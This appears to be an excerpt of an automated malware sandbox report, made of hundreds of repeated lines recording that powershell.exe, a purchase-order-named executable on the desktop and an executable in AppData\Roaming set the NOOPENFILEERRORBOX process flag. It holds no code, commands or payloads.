Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
